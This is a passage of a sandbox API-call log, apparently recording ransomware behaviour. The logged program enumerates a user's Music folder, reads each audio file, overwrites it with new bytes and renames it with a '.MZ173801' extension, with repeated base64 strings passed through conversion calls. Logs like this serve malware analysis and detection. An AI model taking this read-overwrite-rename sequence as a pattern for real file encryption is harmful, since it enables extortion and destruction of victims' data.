lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242eccc, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.325] GetCurrentThreadId () returned 0x1358 [0117.325] GetCurrentThreadId () returned 0x1358 [0117.325] GetCurrentThreadId () returned 0x1358 [0117.325] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\8MMQ.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\8mmq.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0117.325] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0117.325] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0117.325] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0xac19 [0117.325] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0117.325] ReadFile (in: hFile=0x408, lpBuffer=0x2439f90, nNumberOfBytesToRead=0xac19, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x2439f90*, lpNumberOfBytesRead=0x19f14c*=0xac19, lpOverlapped=0x0) returned 1 [0117.327] CloseHandle (hObject=0x408) returned 1 [0117.327] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\8MMQ.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\8mmq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0117.329] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xac19, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f158*=0xac19, lpOverlapped=0x0) returned 1 [0117.331] CloseHandle (hObject=0x408) returned 1 [0117.446] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\8MMQ.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\8mmq.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\8MMQ.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\8mmq.m4a.mz173801")) returned 1 [0117.447] GetCurrentThreadId () returned 0x1358 [0117.447] GetCurrentThreadId () returned 0x1358 [0117.447] GetCurrentThreadId () returned 0x1358 [0117.447] GetCurrentThreadId () returned 0x1358 [0117.447] GetCurrentThreadId () returned 0x1358 [0117.447] GetCurrentThreadId () returned 0x1358 [0117.447] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x939924c0, ftCreationTime.dwHighDateTime=0x1d5ed88, ftLastAccessTime.dwLowDateTime=0xc25786a0, ftLastAccessTime.dwHighDateTime=0x1d5e863, ftLastWriteTime.dwLowDateTime=0xc25786a0, ftLastWriteTime.dwHighDateTime=0x1d5e863, nFileSizeHigh=0x0, nFileSizeLow=0xd09b, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="CVDQqBTbc3T7O.m4a", cAlternateFileName="CVDQQB~1.M4A")) returned 1 [0117.447] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0117.447] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.447] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\CVDQqBTbc3T7O.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\cvdqqbtbc3t7o.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x939924c0, ftCreationTime.dwHighDateTime=0x1d5ed88, ftLastAccessTime.dwLowDateTime=0xc25786a0, ftLastAccessTime.dwHighDateTime=0x1d5e863, ftLastWriteTime.dwLowDateTime=0xc25786a0, ftLastWriteTime.dwHighDateTime=0x1d5e863, nFileSizeHigh=0x0, nFileSizeLow=0xd09b)) returned 1 [0117.448] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.448] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.448] GetCurrentThreadId () returned 0x1358 [0117.448] GetCurrentThreadId () returned 0x1358 [0117.448] GetCurrentThreadId () returned 0x1358 [0117.448] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.448] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.449] GetCurrentThreadId () returned 0x1358 [0117.449] GetCurrentThreadId () returned 0x1358 [0117.449] GetCurrentThreadId () returned 0x1358 [0117.449] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\CVDQqBTbc3T7O.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\cvdqqbtbc3t7o.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0117.449] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0117.449] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0117.449] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0xd09b [0117.449] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0117.449] ReadFile (in: hFile=0x408, lpBuffer=0x2432c60, nNumberOfBytesToRead=0xd09b, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f14c*=0xd09b, lpOverlapped=0x0) returned 1 [0117.450] CloseHandle (hObject=0x408) returned 1 [0117.451] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\CVDQqBTbc3T7O.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\cvdqqbtbc3t7o.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0117.452] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xd09b, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f158*=0xd09b, lpOverlapped=0x0) returned 1 [0117.454] CloseHandle (hObject=0x408) returned 1 [0117.456] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\CVDQqBTbc3T7O.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\cvdqqbtbc3t7o.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\CVDQqBTbc3T7O.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\cvdqqbtbc3t7o.m4a.mz173801")) returned 1 [0117.456] GetCurrentThreadId () returned 0x1358 [0117.457] GetCurrentThreadId () returned 0x1358 [0117.457] GetCurrentThreadId () returned 0x1358 [0117.457] GetCurrentThreadId () returned 0x1358 [0117.457] GetCurrentThreadId () returned 0x1358 [0117.457] GetCurrentThreadId () returned 0x1358 [0117.457] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x193b0b40, ftCreationTime.dwHighDateTime=0x1d5e990, ftLastAccessTime.dwLowDateTime=0x5b4ff0d0, ftLastAccessTime.dwHighDateTime=0x1d5e5b3, ftLastWriteTime.dwLowDateTime=0x5b4ff0d0, ftLastWriteTime.dwHighDateTime=0x1d5e5b3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="Ds2vVA7R", cAlternateFileName="")) returned 1 [0117.457] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978516f0, ftCreationTime.dwHighDateTime=0x1d5ea51, ftLastAccessTime.dwLowDateTime=0x981c90b0, ftLastAccessTime.dwHighDateTime=0x1d5ec2d, ftLastWriteTime.dwLowDateTime=0x981c90b0, ftLastWriteTime.dwHighDateTime=0x1d5ec2d, nFileSizeHigh=0x0, nFileSizeLow=0x15a8a, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="LWQBu.mp3", cAlternateFileName="")) returned 1 [0117.457] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0117.457] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.457] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\LWQBu.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\lwqbu.mp3"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978516f0, ftCreationTime.dwHighDateTime=0x1d5ea51, ftLastAccessTime.dwLowDateTime=0x981c90b0, ftLastAccessTime.dwHighDateTime=0x1d5ec2d, ftLastWriteTime.dwLowDateTime=0x981c90b0, ftLastWriteTime.dwHighDateTime=0x1d5ec2d, nFileSizeHigh=0x0, nFileSizeLow=0x15a8a)) returned 1 [0117.457] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.457] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1N